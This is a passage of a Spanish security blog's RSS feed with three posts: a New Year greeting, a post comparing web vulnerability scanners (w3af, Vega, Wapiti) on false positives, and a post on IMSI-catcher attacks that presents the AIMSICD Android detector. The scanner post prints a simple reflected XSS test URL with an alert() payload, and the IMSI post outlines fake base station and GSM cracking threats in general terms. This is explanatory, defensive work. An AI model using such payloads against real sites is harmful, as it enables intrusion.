justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Finalizo el año ilusionado con el nuevo proyecto de vigilancia de páginas WEB &lt;a href=&quot;http://www.webguardshield.com/&quot; target=&quot;_blank&quot;&gt;(webguardshield.com&lt;/a&gt;) y con la vista puesta en el lanzamiento de &lt;a href=&quot;http://secnapsis.com/&quot;&gt;secnapsis.com&lt;/a&gt; | Si olvidarme de mis alumnos del &lt;a href=&quot;http://trajano.us.es/seguridadtic/&quot; target=&quot;_blank&quot;&gt;Máster de Seguridad TIC&lt;/a&gt; que en su 2 edición habrá más Hacking, más Metasploit y algo de Python para Hackers, siempre con la ilusión de cada año, en cada edición intentamos superar sus expectativas y eso, genera la necesidad de renovarse en un ciclo constante!!!&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Y por supuesto de cara a un nuevo año, ST2Blog renueva imagen más acorde con las actividades y contenido que nos espera! #HappyHacking2015&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Esperemos que este nuevo año que va a dar comienzo, nos traiga a todos #ciberseguridad y buenas practicas!!&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Nos vemos en 2015 !!! ah!! y por supuesto os deseo un Feliz Año Nuevo!&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;PD: Espero poder escribir algunos #post sobre los nuevos proyectos muy pronto!&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;a href=&quot;https://twitter.com/st2labs&quot; target=&quot;_blank&quot;&gt;@ST2Labs&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Julian J. Gonzalez (&lt;a href=&quot;https://twitter.com/rhodius&quot; target=&quot;_blank&quot;&gt;@rhodius&lt;/a&gt;)&lt;/div&gt;</description><link>http://www.seguridadparatodos.es/2014/12/feliz-iv-navidad-merry-xmas.html</link><author>noreply@blogger.com (Julian J. Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-NfS723nBRrU/VKKKj8dWomI/AAAAAAAAcLg/ZpD84ZDJfUg/s72-c/MerryXmas.png" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-289179296556432522</guid><pubDate>Wed, 05 Nov 2014 19:27:00 +0000</pubDate><atom:updated>2014-11-05T20:27:09.077+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Audit</category><category domain="http://www.blogger.com/atom/ns#">Auditoria</category><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">IT Security Audit</category><category domain="http://www.blogger.com/atom/ns#">Scanner</category><category domain="http://www.blogger.com/atom/ns#">Vulnerabilidad</category><category domain="http://www.blogger.com/atom/ns#">Vulnerability</category><category domain="http://www.blogger.com/atom/ns#">Wapiti</category><category domain="http://www.blogger.com/atom/ns#">Web</category><category domain="http://www.blogger.com/atom/ns#">Webapps</category><title>Análisis de Vulnerabilidades WEB y los falsos positivos </title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-YmerRbSP7KI/VFp5_UZto4I/AAAAAAAAbKI/xaOw_t6BBI0/s1600/web_SCAN_HEAD.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://3.bp.blogspot.com/-YmerRbSP7KI/VFp5_UZto4I/AAAAAAAAbKI/xaOw_t6BBI0/s1600/web_SCAN_HEAD.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;En el Análisis de Vulnerabilidades es muy frecuente que se realicen varios test / scanner con diferentes herramientas para llevar a cabo una eliminación de falsos positivos (especialmente durante Auditorias de Seguridad a aplicación WEB). Una vez tienes el resultado, se verifican manualmente los resultados con objeto de ofrecer un informe con el mínimo número de falsos positivos posibles.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;En un CSIRT (&lt;i&gt;&lt;span style=&quot;background-color: white; color: #252525; font-family: sans-serif; font-size: 14px; line-height: 22.3999996185303px;&quot;&gt;Computer Security Incident Response Team&lt;/span&gt;&lt;/i&gt;), una de sus funciones es el descubrimiento y análisis de vulnerabilidades; Fue durante un análisis rutinario donde ocurrio algo curioso que paso a comentar a continuación.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;span style=&quot;text-align: justify;&quot;&gt;Durante la revisión manual de un&amp;nbsp;&lt;/span&gt;&lt;b style=&quot;text-align: justify;&quot;&gt;análisis de vulnerabilidades &lt;/b&gt;&lt;span style=&quot;text-align: justify;&quot;&gt;a una página WEB&lt;/span&gt;&lt;span style=&quot;text-align: justify;&quot;&gt; encontré discrepancia entre varias herramientas, en particular entre el resultado obtenido con &lt;/span&gt;&lt;a href=&quot;http://w3af.org/&quot; style=&quot;text-align: justify;&quot; target=&quot;_blank&quot;&gt;w3af&lt;/a&gt;&lt;span style=&quot;text-align: justify;&quot;&gt; y &lt;/span&gt;&lt;a href=&quot;http://www.seguridadparatodos.es/2012/02/vega-nueva-solucion-open-source-para.html&quot; style=&quot;text-align: justify;&quot; target=&quot;_blank&quot;&gt;Vega&lt;/a&gt;&lt;span style=&quot;text-align: justify;&quot;&gt;, donde una herramienta (VEGA) informaba de una posible vulnerabilidad XSS, mientras que otra ni si quiera lo mencionaba.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;En la verificación manual, el típico &amp;lt;script&amp;gt;alert(1);&amp;lt;/script&amp;gt;, tampoco mostraba ninguna constancia de la existencia de dicha vulnerabilidad XSS, probando algunas de las variantes, encontré al final una sentencia que confirmaría la existencia de la vulnerabilidad:&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-Fal35zsMejk/VFpeNxpJlNI/AAAAAAAAbJU/TIt_yznVq8I/s1600/XSS_vulnerable_Alert.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://2.bp.blogspot.com/-Fal35zsMejk/VFpeNxpJlNI/AAAAAAAAbJU/TIt_yznVq8I/s1600/XSS_vulnerable_Alert.png&quot; height=&quot;384&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=&quot;tr-caption&quot;&gt;POC - XSS Vulnerable&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;Comando (XSS):&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;pre style=&quot;background-color: #fafafa; border-bottom-left-radius: 4px; border-bottom-right-radius: 4px; border-top-left-radius: 4px; border-top-right-radius: 4px; border: 1px solid rgb(204, 204, 204); box-sizing: border-box; color: #333333; font-family: Menlo, Monaco, Consolas, &#39;Courier New&#39;, monospace; font-size: 13px; line-height: 1.42857143; margin-bottom: 10px; overflow: auto; padding: 9.5px; word-break: break-all; word-wrap: break-word;&quot;&gt;&lt;span style=&quot;background-color: transparent; text-align: justify;&quot;&gt;http://www.example.com/index.php?var=&#39;&amp;lt;script&amp;gt;alert(&#39;XSS Vulnerable&#39;);&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;/pre&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Fue entonces, cuando decidí buscar información sobre la precisión que tenia la herramienta w3af en el análisis de vulnerabilidades y encontré un proyecto Open Source&amp;nbsp;(&lt;a href=&quot;https://code.google.com/p/wavsep/&quot; target=&quot;_blank&quot;&gt;WAVSEP&lt;/a&gt;) que se encarga precisamente de evaluar herramientas de seguridad, aplicando varias pruebas sobre entornos vulnerables.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;El ultimo informe &lt;a href=&quot;http://sectooladdict.blogspot.com.es/2014/02/wavsep-web-application-scanner.html&quot; target=&quot;_blank&quot;&gt;WAVSEP 2013/2014&lt;/a&gt;, se analizan múltiples herramientas de seguridad tanto comerciales como open source; y si accedéis a la página web con el brenchmark (score board), encontrareis un completo análisis de cada herramienta con la precisión, falsos positivos, etc ordenado por tipo de ataque (XSS, SQLi, ..).&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-LwRAEHDhhJc/VFpiIOhZHdI/AAAAAAAAbJg/wGuXuCwPmnM/s1600/XSS_w3af_brechmark.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://3.bp.blogspot.com/-LwRAEHDhhJc/VFpiIOhZHdI/AAAAAAAAbJg/wGuXuCwPmnM/s1600/XSS_w3af_brechmark.png&quot; height=&quot;76&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;W3af - WAVSEP Score&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Curiosamente, w3af no sale muy bien parado en éste análisis, y si además, puedo confirmar que no detecto una vulnerabilidad del tipo XSS, lo que me lleva a descartar la herramienta y buscar otra que sea open source.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-NQu0i9cxVYQ/VFpk0lGrpnI/AAAAAAAAbJs/f_3mZnMJvVk/s1600/XSS_VEGA_brechmark.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://2.bp.blogspot.com/-NQu0i9cxVYQ/VFpk0lGrpnI/AAAAAAAAbJs/f_3mZnMJvVk/s1600/XSS_VEGA_brechmark.png&quot; height=&quot;82&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;Vega - WAVSEP Score&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;En la puntuación (score) del brenchmark, VEGA (la herramienta que había utilizado y que ha detectado dicha vulnerabilidad XSS), obtiene muy buen resultado (0% falsos positivos en XSS reflected), si a esto le unimos que w3af obtenía también algunos otros falsos positivos.&amp;nbsp;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Fue el momento de examinar con algo de más detenimiento el brenchmark y encontré wapiti, una herramienta de línea de comando escrita en python, múltiples formatos de salida y que además obtiene mejor puntuación en el brechmark que w3af.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-7X1kJA10Xhk/VFpm1-JxNkI/AAAAAAAAbJ4/8jZS1aJf3ag/s1600/XSS_wapiti_brechmark.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://1.bp.blogspot.com/-7X1kJA10Xhk/VFpm1-JxNkI/AAAAAAAAbJ4/8jZS1aJf3ag/s1600/XSS_wapiti_brechmark.png&quot; height=&quot;82&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Realice un test de la herramienta en la misma página web, ejecutando solamente el motor de XSS, y lo detecto a la primera. Además la herramienta tiene un modulo de detección de XSS persistentes, lo que lo hace aún más interesante.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Será en mi próximo artículo cuando hablaré de la herramienta &lt;a href=&quot;http://wapiti.sourceforge.net/&quot; target=&quot;_blank&quot;&gt;wapiti&lt;/a&gt;, que esta incluida en KaliLinux, pero que también se encuentra disponible para windows (Pyexe) y en su versión de desarrollo, SVN incluye un modulo de detección de shellshock (ultima actualización SEP/14).&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;#ST2Labs&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;#ACS iSecurity&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;#CSIRT Team Leader&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;@ACSHackLabs&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;@ST2Labs&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;</description><link>http://www.seguridadparatodos.es/2014/11/web-vulnerability-false-positive.html</link><author>noreply@blogger.com (Julian J. Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-YmerRbSP7KI/VFp5_UZto4I/AAAAAAAAbKI/xaOw_t6BBI0/s72-c/web_SCAN_HEAD.png" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-8636686301991930806</guid><pubDate>Thu, 23 Oct 2014 16:16:00 +0000</pubDate><atom:updated>2014-10-23T18:16:02.679+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">2G</category><category domain="http://www.blogger.com/atom/ns#">3G</category><category domain="http://www.blogger.com/atom/ns#">4G</category><category domain="http://www.blogger.com/atom/ns#">Android</category><category domain="http://www.blogger.com/atom/ns#">Apps</category><category domain="http://www.blogger.com/atom/ns#">Ciberseguridad</category><category domain="http://www.blogger.com/atom/ns#">GSM</category><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">LTE</category><category domain="http://www.blogger.com/atom/ns#">Mobile</category><category domain="http://www.blogger.com/atom/ns#">Seguridad Moviles</category><category domain="http://www.blogger.com/atom/ns#">ST2</category><category domain="http://www.blogger.com/atom/ns#">ST2Labs</category><category domain="http://www.blogger.com/atom/ns#">Tools</category><title>Android IMSI-Catcher-Detector AIMSICD</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-B1MThVZKlrY/VEkowpuCUXI/AAAAAAAAbBY/dQl4pNqhQE8/s1600/AIMSICD_ST2_seguridadparatodos.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://3.bp.blogspot.com/-B1MThVZKlrY/VEkowpuCUXI/AAAAAAAAbBY/dQl4pNqhQE8/s1600/AIMSICD_ST2_seguridadparatodos.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Las vulnerabilidad en el protocolo GSM/3G no es algo novedoso (véase mi &lt;a href=&quot;http://www.seguridadparatodos.es/2011/12/video-del-webminar-online-sobre.html&quot; target=&quot;_blank&quot;&gt;articulo&lt;/a&gt; al respecto), todos sabemos que cuando no disponemos de cobertura H+/4G, la estación base y el móvil negocian conectarse mediante 2G/GSM/GPRS para no quedarte sin cobertura.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Uno de los ataques que esta cogiendo popularidad es utilizar falsa estaciones base (fake BTS) para capturar el IMSI de los terminales móviles en el radio de acción en el que actúa. La policía, lo suele utilizar en concentraciones / manifestaciones, y/o para rastrear a determinados usuarios/delincuentes.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;Tengo el IMSI, y ¿ahora que?&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;El IMSI (Identidad Internacional del Abonado a un Móvil), una vez se tiene la identificación del abonado, se puede realizar un ataque de suplantación de identidad, spoofing de SMS, llamar a cargo de la cuenta del abonado, etc.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Por ejemplo, en países como Rusia, China o Brazil, los ciberelincuentes están montando estaciones base (Fake BTS) donde capturar el IMSI para realizar SPAM y/o ataques de Phising mediante mensajes de texto (SMS).&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;A esto hay que añadir que los &quot;hackers&quot; están aplicando ingeniería inversa a las &lt;a href=&quot;http://www.heise.de/netze/meldung/Hacker-bauen-Spionage-Tools-der-NSA-nach-2235339.html&quot; target=&quot;_blank&quot;&gt;NSA-Tools&lt;/a&gt;, y están liberando aplicaciones como &lt;a href=&quot;http://www.nsaplayset.org/twilightvegetable&quot; target=&quot;_blank&quot;&gt;TWILIGHTVEGETABLE&lt;/a&gt;&amp;nbsp;conjunto de herramienta capaz de monitorizar (capturar) de forma pasiva la red GSM, o &lt;a href=&quot;http://drizzlechair/&quot; target=&quot;_blank&quot;&gt;DRIZZLECHAIR&lt;/a&gt;&amp;nbsp;son 2TBytes con todas las herramientas necesarias, así como pre-hashed (rainbow tables) para crackear (descifrar) el cifrado A5/1 de GSM. !! Es solo cuestión de tiempo que cualquiera pueda espiar las comunicaciones GSM de tu barrio ¡¡&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;SOLUCIÓN / PROTECCIÓN&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Solo existe una solución &quot;preventiva&quot; sería configurar el móvil para evitar que se conecte a la red GSM (2G), esto tiene la ventaja de proteger en los ataques al protocolo GSM, aunque por contra, te quedarías sin cobertura en algunas zonas / edificios.&amp;nbsp;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;No obstante, deshabilitar la red 2G, protege frente a los ataques de cifrado de GSM, pero recientemente se &lt;a href=&quot;http://www.layakk.com/docs/PicoPerez_Rooted2014_FINAL_bis-ENGLISH.pdf&quot; target=&quot;_blank&quot;&gt;publico&lt;/a&gt; que la red 3G tiene una debilidad que permite &lt;a href=&quot;http://www.pki-electronic.com/products/interception-and-monitoring-systems/3g-umts-imsi-catcher/&quot; target=&quot;_blank&quot;&gt;capturar &lt;/a&gt;el ISMI (en el proceso de formar al móvil en 3G a utilizar 2G), por lo que solamente en 4G podríamos decir que estaríamos completamente protegidos (de momento). Aunque tendríamos que poder deshabilitar la red 2G/3G en el móvil, ya que los atacantes pueden formar mediante la Fake BTS a que el terminal móvil utilice 2G/3G.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Por esta razón, se ha liberado la aplicación para Android&amp;nbsp;AIMSICD (&lt;a href=&quot;https://secupwn.github.io/Android-IMSI-Catcher-Detector/&quot; target=&quot;_blank&quot;&gt;Android IMSI-Catcher-Detector&lt;/a&gt;), que detecta y evitar que las estaciones base falsa (fake BTS) en redes GSM/3G capturen el ISMI en terminales móviles con Android.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-GqWmRPzAcEY/VEkmwDOEgXI/AAAAAAAAbAk/WmPpIr3B1U0/s1600/AIMSICD-Banner_Large.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://3.bp.blogspot.com/-GqWmRPzAcEY/VEkmwDOEgXI/AAAAAAAAbAk/WmPpIr3B1U0/s1600/AIMSICD-Banner_Large.png&quot; height=&quot;128&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/-7mnJHQa6p6w/VEkm08365WI/AAAAAAAAbBM/f5TWyYqyUas/s1600/Cell_Information.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://4.bp.blogspot.com/-7mnJHQa6p6w/VEkm08365WI/AAAAAAAAbBM/f5TWyYqyUas/s1600/Cell_Information.png&quot; height=&quot;320&quot; width=&quot;180&quot; /&gt;&lt;/a&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-I5qZyi-KV-g/VEkm0vFa2SI/AAAAAAAAbAs/l6Wc97gZtAw/s1600/Device_Details.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://1.bp.blogspot.com/-I5qZyi-KV-g/VEkm0vFa2SI/AAAAAAAAbAs/l6Wc97gZtAw/s1600/Device_Details.png&quot; height=&quot;320&quot; width=&quot;180&quot; /&gt;&lt;/a&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-ui0bACPCVnw/VEkm09Dv2RI/AAAAAAAAbAw/XYhmF5-AEk0/s1600/MapStyle_Normal.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://3.bp.blogspot.com/-ui0bACPCVnw/VEkm09Dv2RI/AAAAAAAAbAw/XYhmF5-AEk0/s1600/MapStyle_Normal.png&quot; height=&quot;320&quot; width=&quot;180&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-m09suD26GoQ/VEkm1Y5R8hI/AAAAAAAAbA0/SJjiXPO3u38/s1600/MapViewer_Styles.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://2.bp.blogspot.com/-m09suD26GoQ/VEkm1Y5R8hI/AAAAAAAAbA0/SJjiXPO3u38/s1600/MapViewer_Styles.png&quot; height=&quot;320&quot; width=&quot;180&quot; /&gt;&lt;/a&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-x0KLBuZJV_c/VEkm1zIVKuI/AAAAAAAAbA4/9Q6ObsKnkIE/s1600/Preferences_Button.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://2.bp.blogspot.com/-x0KLBuZJV_c/VEkm1zIVKuI/AAAAAAAAbA4/9Q6ObsKnkIE/s1600/Preferences_Button.png&quot; height=&quot;320&quot; width=&quot;180&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;REFERENCIAS&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;ul style=&quot;font-family: OpenSansRegular, &#39;Helvetica Neue&#39;, Helvetica, Arial, sans-serif; font-size: 14px; line-height: 21px; list-style-image: url(https://secupwn.github.io/Android-IMSI-Catcher-Detector/images/bullet.png); margin: 0px 0px 20px; padding: 0px 0px 0px 40px; text-align: start;&quot;&gt;&lt;li&gt;&lt;span style=&quot;font-family: OpenSansBold, &#39;Helvetica Neue&#39;, Helvetica, Arial, sans-serif !important;&quot;&gt;&lt;a href=&quot;https://firstlook.org/theintercept/article/2014/02/10/the-nsas-secret-role/&quot; style=&quot;outline: 0px; text-decoration: none;&quot;&gt;NSA-Killings with IMSI-Catcher drones&lt;/a&gt;&lt;/span&gt;.&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;a href=&quot;http://www.youtube.com/watch?v=Ydo19YOzpzU&quot; style=&quot;text-decoration: none;&quot;&gt;How easy it is to clone phones&lt;/a&gt;.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;Talk by Karsten Nohl and Luca Melette on&amp;nbsp;&lt;a href=&quot;http://youtu.be/YWdHSJsEOck&quot; style=&quot;text-decoration: none;&quot;&gt;28c3: Defending mobile phones&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;a href=&quot;https://www.eff.org/deeplinks/2012/10/stingrays-biggest-unknown-technological-threat-cell-phone-privacy&quot; style=&quot;text-decoration: none;&quot;&gt;Stingrays: Biggest Technological Threat&lt;/a&gt;.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;a href=&quot;https://www.privacyinternational.org/blog/beirtear-na-imsis-irelands-gsoc-surveillance-inquiry-reveals-use-of-mobile-phone-interception&quot; style=&quot;text-decoration: none;&quot;&gt;GSOC reveals hidden IMSI-Catcher&lt;/a&gt;.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;a href=&quot;https://secupwn.github.io/Android-IMSI-Catcher-Detector/&quot; target=&quot;_blank&quot;&gt;AIMSICD&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</description><link>http://www.seguridadparatodos.es/2014/10/android-imsi-catcher-detector-aimsicd.html</link><author>noreply@blogger.com (Julian J. Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" 